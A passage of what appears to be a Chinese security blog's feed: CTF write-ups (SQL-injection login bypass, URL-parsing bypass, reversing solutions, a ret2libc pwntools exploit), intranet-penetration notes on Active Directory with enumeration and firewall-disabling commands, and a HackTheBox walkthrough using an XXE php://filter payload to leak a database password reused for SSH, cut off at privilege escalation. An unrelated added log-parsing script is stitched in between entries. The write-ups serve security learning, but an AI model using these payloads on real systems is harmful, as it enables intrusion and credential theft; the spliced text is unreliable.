class="code"><pre><code class="hljs sql">username<span class="hljs-operator">=</span>admin<span class="hljs-operator">&</span>password<span class="hljs-operator">=</span><span class="hljs-operator">||</span><span class="hljs-number">1</span><span class="hljs-operator">=</span><span class="hljs-number">1</span># <br></code></pre></td></tr></table></figure><p>本来以为可能是考察盲注,结果登录进去就有flag 。。。</p><p><img src="https://i.loli.net/2021/10/25/e6qIF8JRDj1BnzQ.png" alt="1.png"></p><h4 id="Easy-WEB"><a href="#Easy-WEB" class="headerlink" title="Easy-WEB"></a>Easy-WEB</h4><p>打开是个登录框,随便试了一下注入,未果。用dirsearch扫了一下,扫到一个 <code>/.DS_Store</code></p><p>然后看到看里面的内容可以发现 有几个php 文件 。先访问了那个<code>yzmcode.php</code> 没啥思路,后面又访问了一下<code>yfhgyrt.php</code> 拿到源码:</p><figure class="highlight php"><table><tr><td 
class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta"><?php</span><br><span class="hljs-title function_ invoke__">header</span>(<span class="hljs-string">"content-type:text/html;charset=utf-8"</span>);<br><span class="hljs-keyword">include</span>(<span class="hljs-string">"./flag.php"</span>);<br><span class="hljs-title function_ invoke__">show_source</span>(<span class="hljs-keyword">__FILE__</span>);<br><br><span class="hljs-keyword">if</span>(<span class="hljs-keyword">isset</span>(<span class="hljs-variable">$_GET</span>[<span class="hljs-string">'url'</span>])){<br> <span class="hljs-variable">$url</span> = <span class="hljs-title function_ invoke__">parse_url</span>(<span class="hljs-variable">$_GET</span>[<span class="hljs-string">'url'</span>]);<br> <span class="hljs-keyword">if</span>(!<span class="hljs-variable">$url</span>){<br> <span class="hljs-keyword">die</span>(<span class="hljs-string">'Can not parse url: '</span>.<span class="hljs-variable">$_GET</span>[<span class="hljs-string">'url'</span>]);<br> }<br> <span class="hljs-keyword">if</span>(<span class="hljs-title function_ invoke__">substr</span>(<span class="hljs-variable">$_GET</span>[<span class="hljs-string">'url'</span>], <span class="hljs-title function_ 
invoke__">strlen</span>(<span class="hljs-string">'http://'</span>), <span class="hljs-title function_ invoke__">strlen</span>(<span class="hljs-string">'google.cn'</span>)) === <span class="hljs-string">'google.cn'</span>){<br> <span class="hljs-keyword">die</span>(<span class="hljs-string">'Hey, 老哥, 你会绕过吗!'</span>);<br> }<br> <span class="hljs-keyword">if</span>(<br> <span class="hljs-variable">$url</span>[<span class="hljs-string">'host'</span>] === <span class="hljs-string">'google.cn'</span><br> ){<br> <span class="hljs-keyword">echo</span> <span class="hljs-string">"flag{"</span>.<span class="hljs-variable">$flag</span>.<span class="hljs-string">"}"</span>;<br> }<span class="hljs-keyword">else</span>{<br> <span class="hljs-keyword">die</span>(<span class="hljs-string">'老哥!!!'</span>);<br> }<br>}<br><span class="hljs-meta">?></span> <br></code></pre></td></tr></table></figure><p>没啥难度,直接用@格式绕过就行</p><p><strong>payload</strong></p><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">http:<span class="hljs-regexp">//</span><span class="hljs-number">47.101</span>.<span class="hljs-number">38.214</span>:<span class="hljs-number">50002</span><span class="hljs-regexp">/yfhgyrt.php?url=http:/</span><span class="hljs-regexp">/My0n9s@google.cn/</span><br></code></pre></td></tr></table></figure><p><img src="https://i.loli.net/2021/10/25/3jEZJtPTySzwvQg.png" alt="3.png"></p><h3 id="Reverse"><a href="#Reverse" class="headerlink" title="Reverse"></a>Reverse</h3><h4 id="s-apk"><a href="#s-apk" class="headerlink" title="s.apk"></a>s.apk</h4><p>APK的题目,直接先拖进jeb里面静态分析一下,主逻辑在MainActivity里面,反编译看一下</p><p><img src="https://i.loli.net/2021/10/25/YBjlhc8D5oEW4CJ.png" alt="image.png"></p><p>直接一个checkSN函数,第一个参数是”Tenshine”,第二个参数是输入的内容</p><p>再看看这个函数的内容</p><p><img src="https://i.loli.net/2021/10/25/MqEsDh9cGZRCNyQ.png" 
alt="image.png"></p><p>逻辑也很简单,就是<code>MD5(参数1)</code>结果的偶数位拼接,加上<code>flag{}</code>包裹后和<code>参数2</code>对比,相当即正确</p><p><strong>exp</strong></p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs python">tmp2 = <span class="hljs-string">'b9c77224ff234f27ac6badf83b855c76'</span> <span class="hljs-comment"># md5("Tenshine")</span><br><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-built_in">len</span>(tmp2)):<br> <span class="hljs-keyword">if</span> i % <span class="hljs-number">2</span> ==<span class="hljs-number">0</span>:<br> <span class="hljs-built_in">print</span>(tmp2[i],end=<span class="hljs-string">''</span>)<br><span class="hljs-comment"># flag{bc72f242a6af3857}</span><br></code></pre></td></tr></table></figure><h4 id="爱生活dota"><a href="#爱生活dota" class="headerlink" title="爱生活dota"></a>爱生活dota</h4><p>32位,无壳,拖进IDA看</p><p>逻辑就在主函数,很简单,贴一下简单的分析</p><p><img src="https://i.loli.net/2021/10/25/aMyCUbQKp72hBTr.png" alt="image.png"></p><p>就是一个用户名和密码,用户名直接给了是<code>StarsWarss</code>,密码有个简单的异或,反推即可</p><p><strong>exp</strong></p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs python">text = [<span class="hljs-number">0x76</span>, <span class="hljs-number">0x2A</span>, <span class="hljs-number">0x1F</span>, <span class="hljs-number">0x58</span>, <span class="hljs-number">0x33</span>, <span 
class="hljs-number">0x2B</span>, <span class="hljs-number">0x38</span>, <span class="hljs-number">0x76</span>, <span class="hljs-number">0x5F</span>, <span class="hljs-number">0x44</span>,<br> <span class="hljs-number">0x79</span>]<br><br>tmp = <span class="hljs-string">'WuSheng2009'</span><br><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-built_in">len</span>(text)):<br> <span class="hljs-built_in">print</span>(<span class="hljs-built_in">chr</span>(text[i] ^ <span class="hljs-built_in">ord</span>(tmp[i])), end=<span class="hljs-string">''</span>)<br><span class="hljs-comment"># 拼接一下</span><br><span class="hljs-comment"># KEY{StarsWarss!_L0VE_Dot@}</span><br></code></pre></td></tr></table></figure><h3 id="Pwn"><a href="#Pwn" class="headerlink" title="Pwn"></a>Pwn</h3><h4 id="math"><a href="#math" class="headerlink" title="math"></a>math</h4><p>就是个栈溢出,但是输入size那里有个abs32取绝对值再取余,在储存有符号数的时候,补码的范围决定了最小的负数(-0x80000000)取绝对值后的结果无法表示,所以此时取绝对值后的结果还是(-0x80000000),然后就可以读入0xe0的内容,接着,puts泄露libc,打onegadget</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span 
class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> * <br><span class="hljs-keyword">from</span> LibcSearcher <span class="hljs-keyword">import</span> *<br>context(os=<span class="hljs-string">'linux'</span>,arch=<span class="hljs-string">'amd64'</span>,log_level=<span class="hljs-string">'debug'</span>)<br><br>p = remote(<span class="hljs-string">"47.100.117.2"</span>,<span class="hljs-number">10005</span>)<br><span class="hljs-comment">#p = process("./math")</span><br>elf = ELF(<span class="hljs-string">"./math"</span>)<br>libc = ELF(<span class="hljs-string">"/lib/x86_64-linux-gnu/libc-2.27.so"</span>)<br>puts_plt = elf.plt[<span class="hljs-string">"puts"</span>]<br>puts_got = elf.got[<span class="hljs-string">"puts"</span>]<br>pop_rdi = <span class="hljs-number">0x400813</span> <span class="hljs-comment">#pop rdi;ret</span><br>main = <span class="hljs-number">0x40075b</span><br>ret = <span class="hljs-number">0x400566</span><br><br><br>p.sendlineafter(<span class="hljs-string">"size\n"</span>,<span class="hljs-built_in">str</span>(<span class="hljs-built_in">int</span>(-<span class="hljs-number">0x80000000</span>)))<br><span class="hljs-comment">#gdb.attach(p)</span><br>payload = <span class="hljs-string">'a'</span>*(<span class="hljs-number">0x40</span>)+ <span class="hljs-string">'b'</span>*<span class="hljs-number">0x8</span>+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main)<br>p.send(payload)<br>p.recvuntil(<span class="hljs-string">'\n'</span>)<br>puts_addr = u64(p.recv(<span class="hljs-number">6</span>).ljust(<span class="hljs-number">8</span>,<span class="hljs-string">'\x00'</span>))<br>log.info(<span class="hljs-string">"puts_addr="</span>+<span 
class="hljs-built_in">hex</span>(puts_addr))<br><br>libc_base = puts_addr-libc.sym[<span class="hljs-string">"puts"</span>]<br>log.info(<span class="hljs-string">"libc_base="</span>+<span class="hljs-built_in">hex</span>(libc_base))<br>ogg = libc_base+<span class="hljs-number">0x4f432</span><br><br>p.sendlineafter(<span class="hljs-string">"size\n"</span>,<span class="hljs-built_in">str</span>(<span class="hljs-built_in">int</span>(-<span class="hljs-number">0x80000000</span>)))<br><br>payload1 = <span class="hljs-string">'a'</span>*(<span class="hljs-number">0x40</span>)+ <span class="hljs-string">'b'</span>*<span class="hljs-number">0x8</span>+p64(ret)+p64(ogg)<br>p.send(payload1)<br>p.interactive()<br></code></pre></td></tr></table></figure>]]></content>
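Added example for the Host_log task above (my code, not the write-up's script, which the post does not reproduce): count every IPv4 address across a set of log files, surface the ones that appear only once, and pull the lines that mention a given address. The log lines are constructed here as stand-ins for the four challenge files. It generalises the post's approach slightly by taking a threshold instead of hard-coding "exactly once"; the regex only matches dotted-quad IPv4, so IPv6 would need a second pattern.

```python
import re
from collections import Counter

# Constructed sample log lines standing in for the four challenge files
# (the real files are not reproduced in the write-up). Each key is a file name.
LOG_FILES = {
    "auth1.log": [
        "Oct 22 10:01:02 host sshd[1201]: Accepted password for lucy from 192.168.100.115 port 50112",
        "Oct 22 10:02:17 host sshd[1202]: Failed password for root from 10.0.0.7 port 40001",
    ],
    "auth2.log": [
        "Oct 22 10:03:44 host sshd[1203]: Failed password for root from 10.0.0.7 port 40002",
        "Oct 22 10:05:01 host sshd[1204]: Accepted password for lucy from 192.168.100.115 port 50113",
    ],
    "dns.log": [
        "Oct 22 10:06:09 host named[88]: client 192.168.100.115#53000: query: example.com IN A",
        "Oct 22 10:06:10 host named[88]: forwarding query to 8.8.4.4#53",
    ],
    "web.log": [
        '10.0.0.7 - - [22/Oct/2021:10:07:00 +0800] "GET /index.php HTTP/1.1" 200 512',
    ],
}

# Dotted-quad IPv4 only; \b keeps it from matching inside longer digit runs.
IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def ip_counts(files):
    """Count how often each IPv4 address occurs across all files (a line may hold several)."""
    counter = Counter()
    for lines in files.values():
        for line in lines:
            counter.update(IP_RE.findall(line))
    return counter


def rare_ips(files, max_count=1):
    """Return the addresses seen at most max_count times, least frequent first.

    The write-up's filter is the max_count=1 case: everything that recurs is noise,
    the one-off is the lead.
    """
    counts = ip_counts(files)
    kept = []
    for ip, c in counts.items():
        if c > max_count:
            continue
        kept.append(ip)
    return sorted(kept, key=lambda ip: (counts[ip], ip))


def context_for(files, ip):
    """Return (file name, line) pairs mentioning ip, so the analyst can read the full record."""
    return [(name, line) for name, lines in files.items() for line in lines if ip in line]


if __name__ == "__main__":
    for ip in rare_ips(LOG_FILES):
        print(ip)
        for name, line in context_for(LOG_FILES, ip):
            print("  ", name, ":", line)
```

Run as a script it prints the one-off address and the records around it; on the real challenge data the same two calls point at 8.8.4.4 and the line carrying the host address and account name.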
<categories>
<category>CTF</category>
</categories>
</entry>
<entry>
<title>Intranet Penetration (2): Setting Up a Domain</title>
<link href="/2021/11/26/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%EF%BC%88%E4%BA%8C%EF%BC%89-%E6%90%AD%E5%BB%BA%E5%9F%9F/"/>
<url>/2021/11/26/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%EF%BC%88%E4%BA%8C%EF%BC%89-%E6%90%AD%E5%BB%BA%E5%9F%9F/</url>
<content type="html"><![CDATA[<p>Since I am a beginner, this post only covers how to set up a single domain in virtual machines.</p><h2 id="准备"><a href="#准备" class="headerlink" title="准备"></a>Preparation</h2><p>First, prepare three installation images: Windows Server 2008 R2 (64-bit) as the domain controller, and Windows 7 (64-bit) and Windows Server 2003 (64-bit) as domain members. Installation itself is not covered here.</p><p>To simulate a LAN with no Internet connectivity, set the network adapter of all three VMs to host-only mode. Then check that the machines can ping each other; turn off the Windows firewall first, since it blocks ICMP echo requests by default.</p><p>Because Windows Server 2008 will be the domain controller, run <code>ipconfig</code> on it to get its IP address (give it a static address so the setting stays valid) and set that address as the DNS server on the two member machines. If all three can ping each other, the network configuration is correct.</p><h2 id="搭建域控"><a href="#搭建域控" class="headerlink" title="搭建域控"></a>Building the domain controller</h2><p>Start with Server 2008: first set a password for the Administrator account.</p><p>Open Server Manager from the taskbar, go to Roles → Add Roles, select Active Directory Domain Services as the server role, and click Next through the wizard to finish installing the role.</p><p>Once the role is installed, return to Server Manager and choose Active Directory Domain Services → Run the Active Directory Domain Services Installation Wizard.</p><p>In the wizard click Next, choose "Create a new domain in a new forest", enter a domain name, select Windows Server 2008 R2 as the forest functional level, and enter the password when prompted.</p><p>Server 2008 then reboots. After the reboot, point Server 2003's DNS server at Server 2008's static IP.</p><p>Finally join Win7 and Server 2003 to the domain: right-click Computer → Properties → System Properties → Change, enter the domain name and click OK.</p><p><strong>Adapted from:</strong><a href="https://blog.csdn.net/weixin_36711901/article/details/102995640">VMware中用虚拟机模拟搭建域(步骤、讲解详实,并以浅显的方式讲解了VMware中的三种网络模式、IP配置),Windows Server 2008 R2为域控服务器,Win7为域成员服务器_胖胖的飞象的博客-CSDN博客_虚拟机怎么创建域</a></p><h2 id="相关命令"><a href="#相关命令" class="headerlink" title="相关命令"></a>Useful commands</h2><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs powershell">List domain users: net user /domain<br>List domain administrators: net <span class="hljs-built_in">group</span> <span class="hljs-string">"domain admins"</span> /domain<br>List domain groups: net <span class="hljs-built_in">group</span> /domain<br>List domain names: net view /domain<br>List computers in domain XX: net view /domain:XX<br>Find the domain time server: net time /domain<br>Find the domain controllers: net <span class="hljs-built_in">group</span> <span class="hljs-string">"Domain controllers"</span> /domain<br>List all domain controllers: dsquery server<br>List members of the domain Administrators group (evaluated on the DC): net localgroup administrators /domain<br>Add a domain user to the local Administrators group: net localgroup administrators workgroup\user001 /add<br>Disable the firewall: netsh advfirewall <span class="hljs-built_in">set</span> allprofiles state off<br></code></pre></td></tr></table></figure><p>With a single domain, finding the DC is simpler than this. Run <code>systeminfo</code> to get the domain name, then ping that name: DNS resolves a domain's own name to the addresses of its domain controllers. Run <code>ipconfig</code> on each machine and compare; the machine whose IP matches the ping result is the DC.</p>]]></content>
<categories>
<category>Web Security</category>
</categories>
<tags>
<tag>Intranet Penetration</tag>
</tags>
</entry>
<entry>
<title>Intranet Penetration (1): Basic Concepts</title>
<link href="/2021/11/19/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%EF%BC%88%E4%B8%80%EF%BC%89-%E7%9B%B8%E5%85%B3%E6%A6%82%E5%BF%B5/"/>
<url>/2021/11/19/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%EF%BC%88%E4%B8%80%EF%BC%89-%E7%9B%B8%E5%85%B3%E6%A6%82%E5%BF%B5/</url>
<content type="html"><![CDATA[<h2 id="工作组"><a href="#工作组" class="headerlink" title="工作组"></a>Workgroup</h2><p>A <strong>workgroup</strong> is the most common and simplest way of organising resources: computers are grouped by function so that they are easier to find and manage.</p><p>A network may contain hundreds or thousands of workstations; if they were all listed flat under Network Neighborhood without any grouping, it would be chaotic.</p><p>Windows 9x/NT/2000 introduced workgroups to address this. In a university, for example, the mathematics department's machines go into a Mathematics workgroup, the Chinese department's machines into a Chinese workgroup, and so on. To reach a department's resources, find its workgroup in Network Neighborhood and double-click it to see that department's computers.</p><p>All computers in a workgroup are peers; none manages the others, which is why a workgroup network is also called a peer-to-peer network.</p><p>For an administrator this makes workgroups inconvenient to manage centrally, which is where domains come in.</p><h2 id="域"><a href="#域" class="headerlink" title="域"></a>Domain</h2><h3 id="域-Domain"><a href="#域-Domain" class="headerlink" title="域 (Domain)"></a>Domain</h3><p>A domain can be thought of as a workgroup upgraded. If a workgroup is a free hostel, a domain is a star-rated hotel: anyone can walk in and out of a workgroup, whereas a domain enforces strict access control.</p><p>In domain mode, at least one server authenticates every computer and user that joins the network, acting like the gatekeeper of an organisation. This server is the domain controller.</p><h3 id="域控制器-Domain-Controller"><a href="#域控制器-Domain-Controller" class="headerlink" title="域控制器 (Domain Controller)"></a>Domain Controller</h3><p>Abbreviated <code>DC</code>. The domain controller holds the database of the domain's accounts, their credentials (stored as password hashes) and the computers that belong to the domain.</p><p>When a computer connects to the network, the DC first checks whether the computer belongs to the domain, whether the account used exists, and whether the password is correct. If any of these fails, the DC refuses the logon from that computer. Without a logon the user cannot reach the permission-protected resources on the servers, which protects the network's resources to a degree.</p><p>Because the DC is the authentication authority, compromising it is the key objective from an attacker's perspective: owning the DC is equivalent to owning the credentials of every account and computer in the domain, since the directory database holding their password hashes can be dumped from it.</p><p>A domain requires Active Directory to be installed on a computer; conversely, the machine on the internal network that has Active Directory installed is a domain controller. Besides domain controllers, a domain contains member servers, client machines and standalone servers.</p><h3 id="父域和子域"><a href="#父域和子域" class="headerlink" title="父域和子域"></a>Parent and child domains</h3><p>As the names suggest, a domain created beneath an existing domain is a child domain. If each department has its own domain and a department has branches, each branch can be a child domain and the department's domain is the parent. Each domain has its own security policy.</p><h3 id="域树"><a href="#域树" class="headerlink" title="域树"></a>Domain tree</h3><p>A domain tree consists of several domains that share a common schema and configuration and form a contiguous namespace.</p><p>The domains in a tree are connected by trust relationships, and an Active Directory contains one or more trees. The deeper a domain sits in the tree, the lower its level; each dot marks a level, so child.Microsoft.com is one level below Microsoft.com, which has a single level.</p><p>Likewise Grandchild.Child.Microsoft.com sits below Child.Microsoft.com. All of these belong to the same tree, and Child.Microsoft.com is a child domain of Microsoft.com.</p><p>Several domain trees can form a forest.</p><h3 id="域林"><a href="#域林" class="headerlink" title="域林"></a>Domain forest</h3><p>A forest is made up of one or more domain trees that do not form a contiguous namespace. That is the main difference from a tree: the trees in a forest have separate namespaces, whereas a tree's domains share one.</p><p>All trees in a forest nevertheless share the same schema, configuration and global catalog. The trees are linked by Kerberos trust relationships, so objects in one tree can be referenced from another. Every forest has a forest root domain, the first domain created in the forest; the root domain of every other tree has a transitive trust with the forest root.</p><p>For example, alongside benet.com.cn one can create accp.com.cn as a member of the same forest; the two then share one forest.</p><p>Creating the first domain controller creates the first domain (the forest root domain) and the first forest.</p><p>A forest, then, is one or more domains sharing a common schema and global catalog; each domain keeps its own security policy and its own trust relationships with other domains. An organisation may have several forests.</p><h2 id="活动目录"><a href="#活动目录" class="headerlink" title="活动目录"></a>Active Directory</h2><p><strong>Active Directory</strong> (<code>AD</code>) is the centralised directory service in Windows Server for managing large network environments; it has shipped with Windows Server since Windows 2000 Server.</p><p>The directory holds information about objects such as users, groups, computers, domains, organizational units (OUs) and security policies. It is stored on the domain controllers and can be queried by network applications and services.</p><p>Active Directory is effectively an index of the resources on the internal network, through which users can quickly locate them.</p><h2 id="DMZ"><a href="#DMZ" class="headerlink" title="DMZ"></a>DMZ</h2><p>A DMZ (demilitarized zone) is a buffer zone between untrusted and trusted systems. It solves the problem that, once a firewall is in place, users on the external network can no longer reach servers on the internal network.</p><p>The DMZ is a separate network segment, neither external nor internal, that hosts public-facing servers holding no confidential data, such as web, e-mail and FTP servers. External visitors can reach only the services in the DMZ and not the information held on the internal network, so even if a DMZ server is compromised the internal network is not directly exposed.</p><h2 id="域内的各种权限"><a href="#域内的各种权限" class="headerlink" title="域内的各种权限"></a>Permissions within a domain</h2><p>Start with groups. A group contains many users; to grant a user some permission, an administrator simply adds the user to the group that carries it, which keeps administration efficient. The common group scopes are domain local, global and universal.</p><p><strong>Domain local group</strong></p><p>Members: from any domain; permissions: only within its own domain</p><p><strong>Global group</strong></p><p>Members: only from its own domain; permissions: in any domain</p><p><strong>Universal group</strong></p><p>Members: from any domain; permissions: in any domain</p><p><strong>A-G-DL-P strategy</strong></p><p>The A-G-DL-P strategy puts user accounts into global groups, nests the global groups in domain local groups, and assigns resource permissions to the domain local groups (with universal groups in between, it becomes A-G-U-DL-P).</p><ul><li>A: user accounts</li><li>G: global groups</li><li>U: universal groups</li><li>DL: domain local groups</li><li>P: resource permissions</li></ul>]]></content>
<categories>
<category>Web Security</category>
</categories>
<tags>
<tag>Intranet Penetration</tag>
</tags>
</entry>
<entry>
<title>HackTheBox--BountyHunter</title>
<link href="/2021/11/19/HackTheBox-BountyHunter/"/>
<url>/2021/11/19/HackTheBox-BountyHunter/</url>
<content type="html"><![CDATA[<h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>Introduction</h2><p>This is the second of my Hack The Box study notes. There is no official write-up, so it took me quite a while to finish. The box is rated Easy, but I am honestly still a beginner and struggled to read the Python code, so privilege escalation took a lot of fiddling before I got the root flag.</p><h2 id="正文"><a href="#正文" class="headerlink" title="正文"></a>Walkthrough</h2><h3 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>Reconnaissance</h3><p>As usual, start with an nmap scan:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">nmap -Pn -A -T4 10.10.11.100<br></code></pre></td></tr></table></figure><p>SSH and a web service are open. Visiting the web service in a browser, the phrase "can use burp" on the page (red box in the screenshot) caught my attention.</p><p><img src="https://i.loli.net/2021/11/19/lEcrsvoS6pYNzuj.png" alt="1.png"></p><h3 id="getshell"><a href="#getshell" class="headerlink" title="getshell"></a>getshell</h3><p>Clicking "portal" leads to a form. Following the hint, fill it in and intercept the request with Burp Suite:</p><p><img src="https://i.loli.net/2021/11/19/CjwK8zlXES5tmsN.png" alt="2.png"></p><p>The submitted data is base64-encoded and then URL-encoded. Decoding it in Decoder gives the following XML:</p><figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs xml"><span class="hljs-meta"><?xml version=<span class="hljs-string">"1.0"</span> encoding=<span class="hljs-string">"ISO-8859-1"</span>?></span><br><span class="hljs-tag"><<span class="hljs-name">bugreport</span>></span><br><span class="hljs-tag"><<span class="hljs-name">title</span>></span>hack<span class="hljs-tag"></<span class="hljs-name">title</span>></span><br><span class="hljs-tag"><<span class="hljs-name">cwe</span>></span>hack<span class="hljs-tag"></<span class="hljs-name">cwe</span>></span><br><span class="hljs-tag"><<span class="hljs-name">cvss</span>></span>hack<span class="hljs-tag"></<span class="hljs-name">cvss</span>></span><br><span class="hljs-tag"><<span class="hljs-name">reward</span>></span>hack<span class="hljs-tag"></<span class="hljs-name">reward</span>></span><br><span class="hljs-tag"></<span class="hljs-name">bugreport</span>></span><br></code></pre></td></tr></table></figure><p>The form fields are embedded in an XML document that the server parses, so an XXE (XML external entity) injection is worth testing.</p><p>Brute-force directories with <code>gobuster</code>:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">gobuster <span class="hljs-built_in">dir</span> -u http://10.10.11.100/ -w /usr/share/wordlists/dirb/common.txt -x php<br></code></pre></td></tr></table></figure><p><img src="https://i.loli.net/2021/11/19/TWLR5eoiAMXrGPp.png"></p><p>There is a <code>db.php</code> that most likely holds database credentials, but requesting it directly returns a blank page, since the PHP is executed rather than shown. So read it through the XXE instead, using the php://filter wrapper to base64-encode the source so that it survives XML parsing. After some searching I built this payload:</p><figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs xml"><span class="hljs-meta"><?xml version=<span class="hljs-string">"1.0"</span> encoding=<span class="hljs-string">"ISO-8859-1"</span>?></span><br><span class="hljs-meta"><!DOCTYPE <span class="hljs-keyword">data</span> [</span><br><span class="hljs-meta"><span class="hljs-meta"><!ENTITY <span class="hljs-keyword">file</span> <span class="hljs-keyword">SYSTEM</span> <span class="hljs-string">"php://filter/convert.base64-encode/resource=db.php"</span>></span></span><br><span class="hljs-meta">]></span><br> <span class="hljs-tag"><<span class="hljs-name">bugreport</span>></span><br> <span class="hljs-tag"><<span class="hljs-name">title</span>></span>hack<span class="hljs-tag"></<span class="hljs-name">title</span>></span><br> <span class="hljs-tag"><<span class="hljs-name">cwe</span>></span>hack<span class="hljs-tag"></<span class="hljs-name">cwe</span>></span><br> <span class="hljs-tag"><<span class="hljs-name">cvss</span>></span>hack<span class="hljs-tag"></<span class="hljs-name">cvss</span>></span><br> <span class="hljs-tag"><<span class="hljs-name">reward</span>></span><span class="hljs-symbol">&file;</span><span class="hljs-tag"></<span class="hljs-name">reward</span>></span><br> <span class="hljs-tag"></<span class="hljs-name">bugreport</span>></span><br></code></pre></td></tr></table></figure><p>Remember to base64-encode and then URL-encode the payload, exactly as the application does, before sending it. The response echoes the reward field, which now contains the base64 of db.php; decoded it reads:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta"><?php</span><br><span class="hljs-comment">// TODO -> Implement login system with the database.</span><br><span class="hljs-variable">$dbserver</span> = <span class="hljs-string">"localhost"</span>;<br><span class="hljs-variable">$dbname</span> = <span class="hljs-string">"bounty"</span>;<br><span class="hljs-variable">$dbusername</span> = <span class="hljs-string">"admin"</span>;<br><span class="hljs-variable">$dbpassword</span> = <span class="hljs-string">"m19RoAU0hP41A1sTsq6K"</span>;<br><span class="hljs-variable">$testuser</span> = <span class="hljs-string">"test"</span>;<br><span class="hljs-meta">?></span><br></code></pre></td></tr></table></figure><p>SSH as admin with this password fails, so there must be another user. Reading <code>/etc/passwd</code> through the same XXE shows a user named development. SSH as development with the password above succeeds (the database password was reused), and the first flag is in the home directory.</p><p><img src="https://i.loli.net/2021/11/19/Azoe89mCXZ45F7Q.png"></p><p><img src="https://i.loli.net/2021/11/19/pJPEQvhzKcYF2uR.png"></p><h3 id="提权"><a href="#提权" class="headerlink" title="提权"></a>Privilege escalation</h3><p><code>sudo su root</code> fails, so check what the user is allowed to run with <code>sudo -l</code>:</p><p><img src="https://i.loli.net/2021/11/19/4sV9e3ZRlEtABHr.png"></p><p>That turns something up: a Python script that may be run as root. Let's look at it:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span 